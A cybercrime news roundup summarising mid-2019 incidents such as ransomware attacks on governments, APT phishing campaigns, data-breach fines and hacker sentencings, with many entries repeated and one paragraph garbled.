CyberCrime - 6 month Recap Aug-Dec 2019
Cybercriminal Poisons OpenPGP Certificates (07/02/2019)
In late June, unknown actors deployed a certificate spamming attack against two high-profile contributors in the OpenPGP community (Robert J. Hansen and Daniel Kahn Gillmor, known in the community as "rjh" and "dkg"). This attack exploited a defect in the OpenPGP protocol in order to "poison" rjh and dkg's OpenPGP certificates. Anyone who attempts to import a poisoned certificate into a vulnerable OpenPGP installation will very likely break their installation, researchers Hansen and Gillmor have warned. Poisoned certificates have since been found on the SKS keyserver network.
In late June, unknown actors deployed a certificate spamming attack against two high-profile contributors in the OpenPGP community (Robert J. Hansen and Daniel Kahn Gillmor, known in the community as "rjh" and "dkg"). This attack exploited a defect in the OpenPGP protocol in order to "poison" rjh and dkg's OpenPGP certificates. Anyone who attempts to import a poisoned certificate into a vulnerable OpenPGP installation will very likely break their installation, researchers Hansen and Gillmor have warned. Poisoned certificates have since been found on the SKS keyserver network.
Global Organizations Targeted by Ryuk Ransomware (07/02/2019)
The UK's National Cyber Security Center (NCSC) published an advisory to promote information regarding current Ryuk ransomware campaigns targeting organizations globally. In some cases, Emotet and Trickbot infections have also been identified on networks targeted by Ryuk. The ransomware often stays hidden until a period of time after the initial infection - ranging from days to months -which allows the actor time to carry out reconnaissance inside an infected network, identifying and targeting critical network systems and maximizing the impact of the attack.
The UK's National Cyber Security Center (NCSC) published an advisory to promote information regarding current Ryuk ransomware campaigns targeting organizations globally. In some cases, Emotet and Trickbot infections have also been identified on networks targeted by Ryuk. The ransomware often stays hidden until a period of time after the initial infection - ranging from days to months -which allows the actor time to carry out reconnaissance inside an infected network, identifying and targeting critical network systems and maximizing the impact of the attack.
Operation Tripoli Compromised Sites Using Fake Facebook Pages to Take Aim at Libya (07/02/2019)
Check Point Software spotted a large-scale campaign that for years was using Facebook pages to spread malware across mobile and desktop environments and specifically targeted Libya. The investigation began when the researchers came across a Facebook page impersonating the commander of Libya's National Army, Khalifa Haftar. The research found that the attacker had been manipulating Facebook for years, compromising legitimate Web sites to host malware, and successfully hitting tens of thousands of victims mainly from Libya, but also in Europe, the United States, and Canada. The campaign has been dubbed "Operation Tripoli."
Check Point Software spotted a large-scale campaign that for years was using Facebook pages to spread malware across mobile and desktop environments and specifically targeted Libya. The investigation began when the researchers came across a Facebook page impersonating the commander of Libya's National Army, Khalifa Haftar. The research found that the attacker had been manipulating Facebook for years, compromising legitimate Web sites to host malware, and successfully hitting tens of thousands of victims mainly from Libya, but also in Europe, the United States, and Canada. The campaign has been dubbed "Operation Tripoli."
Ratsnif Trojans in Heavy Use by OceanLotus Threat Actor (07/02/2019)
According to analysis from BlackBerry Cylance, the OceanLotus group is using a suite of remote access Trojans dubbed "Ratsnif" to leverage new network attack capabilities. The researchers have analyzed the Ratsnif Trojans, which have been under active development since 2016 and combine capabilities like packet sniffing, gateway/device Address Resolution Protocol poisoning, DNS poisoning, HTTP injection, and Media Access Control spoofing. Upon execution, Ratsnif creates a run once mutex named "onceinstance", initializes Winsock version 2.2, and harvests system information to send to its attacker's command and control server.
According to analysis from BlackBerry Cylance, the OceanLotus group is using a suite of remote access Trojans dubbed "Ratsnif" to leverage new network attack capabilities. The researchers have analyzed the Ratsnif Trojans, which have been under active development since 2016 and combine capabilities like packet sniffing, gateway/device Address Resolution Protocol poisoning, DNS poisoning, HTTP injection, and Media Access Control spoofing. Upon execution, Ratsnif creates a run once mutex named "onceinstance", initializes Winsock version 2.2, and harvests system information to send to its attacker's command and control server.
Sony Online Entertainment Hacker Receives Jail Sentence (07/09/2019)
Austin Thompson of Utah was sentenced to 27 months in prison for carrying out a series of denial-of-service attacks against multiple victims between 2013 and 2014, the Justice Department (DOJ) announced. Thompson was also ordered to pay $95,000 USD in restitution to Daybreak Games, formerly Sony Online Entertainment. The attacks took down game servers and related computers around the world, often for hours at a time.
Austin Thompson of Utah was sentenced to 27 months in prison for carrying out a series of denial-of-service attacks against multiple victims between 2013 and 2014, the Justice Department (DOJ) announced. Thompson was also ordered to pay $95,000 USD in restitution to Daybreak Games, formerly Sony Online Entertainment. The attacks took down game servers and related computers around the world, often for hours at a time.
TA505 Threat Entity Implements AndroMut (FlawedAmmyy) Malware in Campaigns (07/02/2019)
The TA505 threat actor introduced a new downloader malware, AndroMut (also known as FlawedAmmyy), which has some similarities in code and behavior to Andromeda, a long-established malware family. Proofpoint researchers observed two distinct campaigns by TA505 that used AndroMut to download the FlawedAmmyy remote access Trojan. The first campaign targeted recipients in South Korea while the second took aim at recipients at financial institutions in Singapore, the UAE, and the US.
The TA505 threat actor introduced a new downloader malware, AndroMut (also known as FlawedAmmyy), which has some similarities in code and behavior to Andromeda, a long-established malware family. Proofpoint researchers observed two distinct campaigns by TA505 that used AndroMut to download the FlawedAmmyy remote access Trojan. The first campaign targeted recipients in South Korea while the second took aim at recipients at financial institutions in Singapore, the UAE, and the US.
UK Fines British Airways, Marriott in Wake of Breaches (07/09/2019)
The UK's Information Commissioner's Office (ICO) intends to fine British Airways œ183.39 million ($230 million USD) for infringements of the General Data Protection Regulation. The proposed fine relates to a cyber incident in September 2018. This incident in part involved user traffic to the British Airways Web site being diverted to a fraudulent site. Through this false site, customer details were harvested by the attackers and the personal data of approximately 500,000 customers was compromised. It is believed that the breach began in June 2018. The ICO's investigation has found that a variety of information was compromised by poor security arrangements at the company, including login, payment card, and travel booking details, names, and addresses. In addition, the ICO will hand down a œ99.2 million ($123 million) fine to the Marriott Starwood hotel chain for a breach in which 383 million guest records were compromised. The ICO said, "It is believed the vulnerability began when the systems of the Starwood hotels group were compromised in 2014. Marriott subsequently acquired Starwood in 2016, but the exposure of customer information was not discovered until 2018. The ICO's investigation found that Marriott failed to undertake sufficient due diligence when it bought Starwood and should also have done more to secure its systems."
The UK's Information Commissioner's Office (ICO) intends to fine British Airways œ183.39 million ($230 million USD) for infringements of the General Data Protection Regulation. The proposed fine relates to a cyber incident in September 2018. This incident in part involved user traffic to the British Airways Web site being diverted to a fraudulent site. Through this false site, customer details were harvested by the attackers and the personal data of approximately 500,000 customers was compromised. It is believed that the breach began in June 2018. The ICO's investigation has found that a variety of information was compromised by poor security arrangements at the company, including login, payment card, and travel booking details, names, and addresses. In addition, the ICO will hand down a œ99.2 million ($123 million) fine to the Marriott Starwood hotel chain for a breach in which 383 million guest records were compromised. The ICO said, "It is believed the vulnerability began when the systems of the Starwood hotels group were compromised in 2014. Marriott subsequently acquired Starwood in 2016, but the exposure of customer information was not discovered until 2018. The ICO's investigation found that Marriott failed to undertake sufficient due diligence when it bought Starwood and should also have done more to secure its systems."
Attackers Probe Election-Related Organizations (07/18/2019)
Microsoft announced that its AccountGuard cyber threat detection service, which launched in August 2018, has identified 781 nation-state attacks taking aim at organizations using the service. Ninety-five percent of these attacks have targeted US-based organizations. Many of the attacks were aimed at think tanks and non-governmental organizations that work closely with political parties and election candidates. Microsoft did not elaborate on if any of the attacks were successful.Dutch National Arrested for Producing, Distributing Rubella Malware (07/17/2019)
The Dutch National Police Unit arrested a Dutch resident suspected of the large-scale production and selling of malware, including Rubella, Cetan and Dryad. The suspect was active in hackers' forums under various names and eventually was tracked down. He is alleged to have created and sold the Rubella Macro Builder toolkit which is used to weaponize Office documents to deliver malicious payloads. McAfee spotted Rubella in the wild and aided in this investigation.GandCrab Might Be Gone but It's Operators Are Back with REvil Ransomware (07/16/2019)
While the operators of the GandCrab ransomware announced they were shuttering their malicious business in June, security researcher Brian Krebs suspects that the threat actors behind it may have reemerged with a new ransomware. KrebsOnSecurity reported that the GandCrab team is most likely behind a program called REvil (also known as Sodin and Sodinokibi). Cisco identified Sodinokibi, which was used to deploy GandCrab while a Dutch firm noticed similarities in how GandCrab and REvil generate URLs within the infection process. Krebs said in a blog post, "My guess is the GandCrab team has not retired, and has simply regrouped and re-branded due to the significant amount of attention from security researchers and law enforcement investigators. It seems highly unlikely that such a successful group of cybercriminals would just walk away from such an insanely profitable enterprise."Malicious Framework Banks Cash Via Ad Fraud (07/18/2019)
A malware framework is responsible for more than one billion fraudulent ad impressions since April, generating its operators significant Google AdSense revenue on a monthly basis. Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams. The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex's browser.StrongPity Adversary Deploys Newly Configured Malware Tools (07/17/2019)
AlienVault has identified an ongoing malware campaign, attributable to the StrongPity (also known as PROMETHIUM) adversary, that began in the second half of 2018. The malware samples appear to have been created and deployed to targets following a toolset rebuild in response to various security vendors reporting on StrongPity's tactics in 2018. One sample is a malicious installer for WinBox, a utility that allows administration of the Mikrotik Router operating system using a simple GUI. Other installers are also being used, including newer versions of WinRAR and a tool called Internet Download Manager which maliciously installs StrongPity and communicates with related adversary infrastructure.SWEED Threat Actor Uses Agent Tesla to Victimize Manufacturing, Logistics Companies (07/17/2019)
A threat actor dubbed "SWEED" by Cisco's Talos researchers is pushing multiple campaigns that use Formbook, Lokibot, and Agent Tesla malware. SWEED has been in operation since at least 2017 and primarily targets victims with stealers and remote access Trojans. The threat actor has used various techniques to infiltrate its victims, but beginning in 2019, SWEED began leveraging malicious Office macros and using different methods to bypass User Account Control on systems. It is targeting small and medium-sized companies in manufacturing and logistics around the world.UK Warns that DNS Hijacking Campaigns Continue (07/16/2019)
An advisory issued by the UK's National Cyber Security Center highlights Domain Name System hijacking activity and offers remediation methods. According to the advisory, multiple regions and sectors have been victimized by these incidents.
APT34/OilRig Impersonates Cambridge U to Lure Victims in Malware-Laced Campaign (07/22/2019)
FireEye identified a phishing campaign conducted by APT34, an Iranian threat actor posing as a member of Cambridge University to gain victims' trust to open malicious documents. The campaign used LinkedIn to deliver the malicious documents and organizations in energy/utilities, government, and oil/gas were the targets. APT34 (also known as OilRig and Greenbug) uses a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. FireEye also identified a variant of the Pickpocket browser credential-stealing tool and two new malware families, VALUEVAULT and LONGWATCH, in use by this campaign.Attackers Actively Exploiting Bug in Campus Platform; 62 Colleges Already Breached (07/24/2019)
The Department of Education issued an advisory regarding the active and ongoing exploitation of a previously identified vulnerability in the Ellucian Banner system. Attackers can leverage the bug to the Banner system with an institutional account. The department has identified 62 colleges or universities that have been affected by exploitation of this vulnerability. Additionally, there is information "that indicates criminal elements have been actively scanning the Internet looking for institutions to victimize through this vulnerability and developing lists of institutions for targeting with this exploitation. Banner is an administrative software system designed for higher education institutions. Security researcher Joshua Mulliken detailed the bug in a December 2018 advisory.Bugs in WordPress Abused to Push Out Malicious Ad Campaign (07/24/2019)
Researchers at Wordfence warn of a malvertising campaign which is causing victims' sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads. By exploiting WordPress vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim Web site. When the third party code executes in a visitor's browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user.Cyber Attacks Cause State of Emergency Declaration in Louisiana (07/24/2019)
Louisiana's governor declared a state of emergency on July 24 due to an ongoing cyber attack that has affected several school districts in the northern part of the state. The Governor's Office of Homeland Security and Emergency Preparedness activated its crisis action team and also the Emergency Services Function-17 to coordinate the response to this cybersecurity incident, which included the FBI and state agencies. Governor John Bel Edwards said, "The state was made aware of a malware attack on a few north Louisiana school systems and we have been coordinating a response ever since,"Facebook Slammed with $5 Billion Penalty for Violating Consumers' Privacy (07/24/2019)
The Federal Trade Commission (FTC) has imposed a $5 billion USD fine and new restrictions on Facebook as punishment for violating consumers' privacy. The settlement order imposes restrictions on Facebook's business operations, creates multiple channels of compliance, and requires Facebook to restructure its approach to privacy. The social media giant must establish strong mechanisms to ensure that Facebook executives are accountable for the decisions they make about privacy, and that those decisions are subject to meaningful oversight. To encourage users to share information on its platform, Facebook promises users they can control the privacy of their information through the platform's privacy settings. Following a year-long investigation, the FTC found that Facebook repeatedly used deceptive practices to undermine users' privacy preferences. These tactics allowed the company to share users' personal information with third-party apps that were downloaded by the user's Facebook "friends." The FTC alleges that many users were unaware that Facebook was sharing such information, and therefore did not take the steps needed to opt-out of sharing. "Despite repeated promises to its billions of users worldwide that they could control how their personal information is shared, Facebook undermined consumers' choices," said FTC Chairman Joe Simons. "The magnitude of the $5 billion penalty and sweeping conduct relief are unprecedented in the history of the FTC. The relief is designed not only to punish future violations but, more importantly, to change Facebook's entire privacy culture to decrease the likelihood of continued violations." The $5 billion penalty is the largest ever imposed on any company for violating consumers' privacy.Former Government Contractor Gets Jail Time for Stealing Classified Data (07/22/2019)
Former National Security Agency (NSA) contractor Harold Martin has been sentenced to nine years in prison for stealing highly classified national defense information for almost 20 years, the Justice Department (DOJ) announced. Beginning in the late 1990s and continuing through August 2016, Martin stole and retained government property from secure locations and computer systems, including documents in both hard copy and digital form relating to national defense.FTC Sues Cambridge Analytica for Deceptive Privacy Practices (07/24/2019)
The Federal Trade Commission (FTC) filed an administrative complaint against data analytics company Cambridge Analytica, and filed settlements for public comment with Cambridge Analytica's former chief executive and an app developer who worked with the company, alleging they employed deceptive tactics to harvest personal information from tens of millions of Facebook users for voter profiling and targeting. The FTC alleges that Cambridge Analytica and two defendants, app developer Aleksandr Kogan and former Cambridge Analytica CEO Alexander Nix, deceived consumers by falsely claiming they did not collect any personally identifiable information from Facebook users who were asked to answer survey questions and share some of their Facebook profile data. Kogan is the developer of the GSRApp that was utilized by Facebook users to answer personality-type questions. Kogan, Nix, and Cambridge Analytica used and analyzed the data collected from the app to train an algorithm to generate personality scores for the app users and their Facebook friends. Those personality scores were then matched to US voter records and used by Cambridge Analytica for voter profiling and targeted advertising services. GSRApp told users it would not download any identifiable information - only demographic data - but the FTC has said that those claims were false and the app collected Facebook User IDs, which connects individuals to their Facebook profiles, as well as other personal information such as their gender, birthdate, location, and their Facebook friends list.Legitimate WeTransfer Links Exploited to Drop Malware-Laced URLs (07/24/2019)
Cofense has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. The attackers are using what appears to be compromised email accounts to send a genuine link to a WeTransfer hosted file. As these are legitimate links from WeTransfer, this allows them to travel straight through security checks at the gateway.Massive DDoS Attack Lasts Nearly Two Weeks, Used Mirai-Infected Devices (07/25/2019)
Imperva mitigated a massive distributed denial-of-service attack that peaked at 292,000 packets per second and used 402,000 compromised devices. The attack, sourced back to Brazil, lasted 13 days and hit an Imperva client in the entertainment industry. The attackers used a legitimate User-Agent, the same as used by the entertainment industry customer service application, to mask the attack which targeted the authentication component of the client's streaming application. Upon analysis, the devices used in the attack all had the same open ports which showed their association with the Mirai malware.Multi-Stage Attack Chain Turns Elasticsearch Servers into DDoS Botnet Zombies (07/24/2019)
Elasticsearch is being abused by turning affected targets into botnet zombies used in distributed denial-of-service (DDoS) attacks. The attack chain involves searching for exposed or publicly accessible Elasticsearch databases/servers. The malware would invoke a shell with an attacker-crafted search query with encoded Java commands. Once this is successfully carried out, the first malicious script is downloaded from a domain, which, in Trend Micro's analysis, appears to be expendable or easy-to-replace. The first-stage script will attempt to shut down the firewall as well as competing and already-running cryptocurrency mining activities and other processes. The second-stage script is then retrieved, likely from a compromised Web site. Using expendable domains allows the attackers to swap URLs as soon as they are detected.Operation LagTime IT Threat Campaign Takes Aim at Asian Infrastructure (07/24/2019)
Proofpoint researchers identified a targeted advanced persistent threat (APT) campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. The campaign, dubbed "Operation LagTime IT," uses spear phishing as its attack vector and a Microsoft Equation Editor zero-day bug to deliver a custom malware called Cotx RAT. Additionally, this APT group implements Poison Ivy payloads that share overlapping command and control infrastructure with the Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic tools used in this operation, Proofpoint analysts attribute this activity to the Chinese APT group known as TA428. The group has targeted government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes.QuickBooks Cloud Host Falls Victim to Ransomware Attack (07/22/2019)
KrebsOnSecurity reported that iNSYNQ, a cloud hosting provider, was hit by a ransomware attack that left its network inaccessible and customers unable to reach their data. iNSYNQ specializes in delivering cloud-based QuickBooks accounting software and services. In a statement, the company said, "The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible. As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment." CEO Elliot Luchansky said in a separate statement on July 22, "iNSYNQ and our customers were the victims of a malware attack that's a totally new variant that hadn't been detected before, confirmed by the experienced and knowledgeable cybersecurity team we've employed."Symantec Examines BEC Scam Statistics (07/24/2019)
According to Symantec telemetry, the average daily volume of business email compromise (BEC) messages was significantly higher in the first quarter of 2019 than in the same period one year ago. From January to March 2018, the average daily BEC email volume was 85,816, while from January to March 2019, the average daily volume was 128,700, a 50% increase. The top five nations targeted by BEC scammers between mid-2018 and mid-2019 were as follows: the US (39%), the UK (26%), Australia (11%), Belgium (3%), and Germany (3%),Three Romanians Receive Jail Time for Hacking Schemes (07/24/2019)
Three Romanian citizens - Teodor Laurentiu Costea, Robert Codrut Dumitrescu, and Cosmin Draghici - have been sentenced to federal prison on wire fraud conspiracy, computer fraud and abuse, and aggravated identity theft charges, the Justice Department (DOJ) announced. The "vishing" and "smishing" schemes resulted in the illegal intrusion into computer servers in the US. The men also deployed phishing messages to thousands of victims and subsequently stole victims' Social Security numbers and bank account information. Losses totaled over $21 million USD. Vishing is a type of phishing scheme that communicates a phishing message, or a message that purports to be from a legitimate source, in this case the victims' banks, through a voice recording. Smishing is similar but communicates a phishing message through text messages.
Attacks Use Brute Force and Ransomware to Target NAS Devices (07/30/2019)
While investigating several ransomware incidents, Synology determined that the causes of these attacks were due to dictionary attacks instead of specific system vulnerabilities. This large-scale attack was targeted at various NAS (network attached storage) models from different vendors, including Synology. In each incident, admins' credentials were stolen by brute-force login attacks, and their data was encrypted. Synology's team strongly recommends users check network and account settings to protect data.BEC Scam Siphons $1.7 Million from NC's Cabarrus County (08/01/2019)
A North Carolina county paid more than $2.5 million USD to a scammer after falling victim to a business email compromise (BEC) scheme that began in November 2018. Cabarrus County officials released details of the scam that diverted a $2,504,601 vendor payment made by the county. Officials have retrieved some of the funds, but more than $1.7 million remains missing. Conspirators posed as representatives of the contracting firm that was to construct a new high school and targeted employees working for the county government by using BEC tactics.Cisco to Pay $8.6 M for Knowingly Selling Flawed Software to US Government (08/01/2019)
Cisco agreed to settle a case for $8.6 million USD after a whistleblower accused the company of knowingly selling flawed video surveillance software to the US government and other customers, ZDNet reported. The case was handled by the False Claims Act and the suit was filed in May 2011 but was not made public until July 31. James Glenn, a Cisco subcontractor who worked at NetDesign in Denmark, said he discovered security holes in the vendor's Video Surveillance Manager (VSM) and notified Cisco in October 2008. The flaws could have enabled attackers to take control of video surveillance cameras and potentially gain access to networks. Cisco did not fix the vulnerabilities and continued to sell the VSM package to customers, including the US government. When Cisco failed to act, Glenn filed a whistleblower case and 18 states joined in. Cisco patched the bugs in 2013 and retired the VSM package a year later.Financial Institution in Kazakhstan Is Cobalt Group's New Target (08/01/2019)
The Cobalt Group cybercriminal actor has taken aim at a bank in Kazakhstan with a decoy document that Check Point Software researchers say may have been lifted from the bank's actual Web site. The malicious file was hosted among the documents repository of the bank, which makes it easy to confuse with a legitimate document. Once downloaded and launched, the fake document uses socially-engineered content to trick victims into running the embedded malicious macros.Georgia's Public Safety Agency Victimized by Ransomware Attack (07/31/2019)
In a statement posted online, the Georgia In a statement posted online, the Georgia Department of Public Safety's (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the incident was first observed on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware was responsible for the attack. 's (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the attack became apparent on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware is to blame for the attack.HEXANE Threat Group Targets Middle Eastern ICS Organizations (07/31/2019)
Dragos identified a new activity group targeting industrial control systems (ICS). HEXANE is targeting oil and gas companies in the Middle East, including Kuwait, as a primary operating region and telecommunication providers in the greater Middle East, Central Asia, and Africa. HEXANE intrusion activity includes malicious documents that drop malware to establish footholds for follow-on activity. The group became operational in mid-2018 but its activity has intensified since early 2019. HEXANE demonstrates similarities to the activity groups MAGNALLIUM and CHRYSENE; all are ICS-targeting activities focusing largely on oil and gas, and some of the behaviors and recently observed tactics, techniques, and procedures are similar. Dragos noted that MAGNALLIUM also has accelerated its activity and has been targeting US government and financial organizations as well as oil and gas companies.Jail Doors Slam on Silk Road Operator (07/30/2019)
Silk Road operator Gary Davis has been sentenced to a 78 month prison term for his role as a member of the cybercriminal marketplace, the Justice Department (DOJ) announced. During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers and other unlawful vendors to distribute over $200 million USD worth of illegal drugs and other illicit goods and services to more than 115,000 buyers, and to launder hundreds of millions of dollars derived from those unlawful transactions. Davis worked as a forum moderator and a site administrator for Silk Road and also as an administrator for its next implementation, Silk Road 2.0.Symantec: Email Extortion Schemes Alive, Well, and Thriving (07/30/2019)
Symantec announced that its technologies blocked 289 million extortion scam emails between January 1 and May 29 - 85 million (nearly 30%) of those messages were blocked in one 17-day period alone. It is not clear which threat actors are behind these scams.
"Warshipping" Delivers Attacks in Packages to Silently Torpedo Corporate Networks (08/07/2019)
A tactic dubbed "warshipping" by IBM's X-Force Red team of researchers involves the use of ecommerce-related package deliveries by cyber thieves with the intention of hacking into corporate or personal home networks from the office mailroom or from someone's front door. By using warshipping, the scientists could infiltrate a network without being detected. Warshipping involves the use of disposable, low-cost, and low-power computers to remotely perform close-proximity attacks, regardless of a cybercriminal's location. A malicious actor can hide a tiny device (similar to the size of a small cellphone) in a package and ship it off to his or her victim to gain access to a specific network. The device, a 3G-enabled, remotely controlled system, can be tucked into the bottom of a packaging box or stuffed inside an item as it is no bigger than the palm of a hand.Advisory Details Password Spraying Attacks Targeting Various Services (08/07/2019)
The Australian Cyber Security Center (ACSC) is aware of a high volume of ongoing password spray attacks targeting Australian organizations. The password spray attacks target users on standard corporate external services such as Webmail, remote desktop access, Active Directory Federated Services, or cloud based services such as Office 365. Depending on the credentials and service, successful authentication can potentially lead to the actor gaining access to corporate emails, the corporate directory, global address books, remote desktop services or administrative access. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory.APT41 Employs Numerous Methods for Its Espionage and Cybercriminal Activities (08/06/2019)
FireEye has detailed its research into APT41, a Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain and has been conducting simultaneous cybercrime and cyber espionage operations from 2014 onward. This entity has an arsenal of over 46 different malware families and tools to accomplish its missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. In one campaign that ran for nearly a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware, including backdoors, credential stealers, keyloggers, and rootkits.Confidence/Romance Scams Continue to Victimize Trusting Individuals (08/06/2019)
The Internet Crime Complaint Center (IC3) posted a warning regarding an increase in confidence/romance scams in which an actor deceives a victim into believing they have a trust relationship and uses that relationship to persuade the victim to send money, provide personal and financial information, purchase items of value for the actor, or even launder money. In 2018, the IC3 received complaints from more than 18,000 individuals who had been victimized by these scams and more than $362 million USD was reported stolen. That year, confidence/romance fraud was the seventh most commonly reported scam to the IC3 based on the number of complaints received, and the second costliest scam in terms of victim loss. Tips to protect against such scams are listed in the IC3 alert.Cryptomining Campaign Impacts More than a Half Million Global Computers (08/07/2019)
Scientists at Carbon Black identified a cryptocurrency mining campaign, "Access Mining," which has been enhanced to steal system access information for possible sale on the dark Web. This campaign potentially affects over 500,000 systems worldwide but most have been located in located in Asia Pacific, Russia and Eastern Europe.. Access Mining uses multi-stage malware that sends detailed system metadata to a network of hijacked Web servers, presumably for the purposes of resale on one (or many) remote access marketplaces across the dark Web.DOJ Uncovers Major Crime Ring at AT&T Call Center (08/07/2019)
The US Department of Justice (DOJ) uncovered a strange case of fraud and "misuse" of AT&T's network centered around the unlocking of smartphones on the company's network. The crime was perpetrated by Pakistani citizen Muhammad Fahd, who bribed staff at a Bothell, Washington AT&T call center in order to have carrier-locked smartphones unlocked from the AT&T network before the company's policy would normally allow it. While this act is already considered criminal, the much more concerning aspect of the incident may be the fact that Fahd also paid AT&T staff to insert malware and "otherwise misuse" the AT&T network for his personal gain. In exchange for facilitating his criminal activity, the participating workers at the call center were bribed to the tune of $428,500 over a five-year period. The numerous charges against Fahd include wire fraud, five charges incidents of Travel Act violations, conspiracy to violate the Computer Fraud and Abuse act, and four counts linked of accessing and damaging protected computers. The DOJ claims the fraud ring unlocked "millions of devices," allowing its ringleader to abuse the early unlocking procedure to make millions of dollars in the process.Feds: Don't Fall Victim to Tragedy-Related Scams (08/06/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) advises businesses and consumers to be vigilant for possible malicious cyber activity seeking to capitalize on the tragic events in El Paso, TX and Dayton, OH. Fraudulent email campaigns are possible after the two mass shootings as some scammers will champion donations for charitable causes, yet use the opportunity to spread malware and siphon money from unsuspecting parties.Hacktivists Abuse SMS Protocol to Mass-Text US Subscribers (08/06/2019)
Two hackers are attempting to text every mobile phone in the US using SMS gateways, a legitimate technology often utilized by businesses to mass-text users, Wired has reported. The hackers, known by their Twitter handles as @j3ws3r and @0xGiraffe, created a script and generated every possible phone number between 1111111 and 9999999 and then connected them to a list of US area codes. Although many of the messages were filtered out by US carriers, some still got through to cell phone users. "I'm here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask," was the message spammed out by @j3ws3r.Middle Eastern Entities Negatively Impacted by Threat Actors OilRig, MuddyWater, Hades (08/06/2019)
In the second half of 2019, Kaspersky researchers observed activity in the Middle East including a series of online asset leaks such as code, infrastructure, group, and apparent victim details, allegedly belonging to known Persian-speaking threat actors, OilRig and MuddyWater. Though these leaks originated from different sources, they all appeared within a few weeks of each other. The third online leak, which was said to expose information related to an entity called the "RANA institute," was published in Persian on a Web site called "Hidden Reality." Kaspersky researchers' analysis of the materials, infrastructure, and the dedicated Web site led to the conclusion that this particular leak could be connected to the threat actor Hades. Hades is the cyber threat group behind the OlympicDestroyer incident targeting the 2018 Winter Olympic Games, as well as the ExPetr worm and other disinformation campaigns. Further details about these infiltrations can be gleaned from Kaspersky's quarterly advanced persistent threats summary.Phishing Campaign Drops LookOut Malware on Critical Infrastructure Companies (08/06/2019)
Between July 19 and July 25, several spear phishing emails were identified targeting three US companies in the utilities sector. The phishing emails appeared to impersonate a US-based engineering licensing board with emails originating from what appears to be an actor-controlled domain, nceess[.]com. This URL is believed to be an impersonation of a domain owned by the US National Council of Examiners for Engineering and Surveying. The emails contain a malicious Word attachment that uses macros to install and run malware that Proofpoint researchers have dubbed "LookBack." This malware consists of a remote access Trojan module and a proxy mechanism used for command and control communication. LookBack appears to be the work of a nation-state actor that is targeting utilities systems and critical infrastructure providers.Rocke Cybercriminal Gang Attacks Cloud Environments (08/06/2019)
Palo Alto Networks released details about Rocke, a China-based cybercrime group engaged in cryptomining operations targeting the cloud. By analyzing NetFlow data between December 2018 and June, the researchers found that 28.1% of the cloud environments surveyed had at least one fully established network connection with at least one known Rocke command and control domain. Several of those organizations maintained near daily connections. Meanwhile, 20% of the organizations maintained hourly heartbeats consistent with Rocke tactics, techniques, and procedures. Rocke also released a new backdoor called Godlua, which could function as an agent, allowing the group's actors to perform additional scripted operations, including denial-of-service attacks, network proxying, and two shell capabilities. NetFlow is a capability on Cisco routers that allows for the collection of IP network traffic.Spammers Abuse Legitimate Company Sites to Send Malicious Messages (08/08/2019)
Kaspersky researchers have identified a global, emerging trend in spam and phishing delivery techniques. Cybercriminals are increasingly exploiting registration, subscription, and feedback forms on trusted company Web sites to insert spam content or phishing links into confirmation emails. The goal of such campaigns is to have emails originate from a legitimate, reputable source so that users do not ignore the unwanted email. The spam messages appear to come from a legitimate company.STRONTIUM/Fancy Bear Compromises IoT Devices to Access Corporate Networks (08/06/2019)
Microsoft researchers discovered infrastructure from STRONTIUM (also known as Sednit, APT28, Pawn Storm, and Fancy Bear) attempting to compromise Internet of Things (IoT) devices, including a voice over IP phone, an office printer, and a video decoder across multiple customer locations. The investigation showed that the threat actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer's passwords, and in the third instance the latest security update had not been applied to the device. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets and enumerated administrative groups for further exploitative purposes. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting.
Cryptocurrency Theft Rises, Despite Increased Security Measures (08/15/2019)
Cybersecurity research firm CipherTrace found that cryptocurrency theft is on the rise, despite increased security measures by many sites and exchanges. According to the site's research, "cybercriminals looted $125 million in Bitcoin, Ethereum and other digital assets from exchanges in Q2 2019." The site pointed to the so-called "exit scam" as the greatest rising threat, with it claiming that more than $3.1 billion may have been stolen via this attack vector, which relies on currency exchange.WSJ: Huawei Helping Two African National Governments Spy on Political Rivals (08/15/2019)
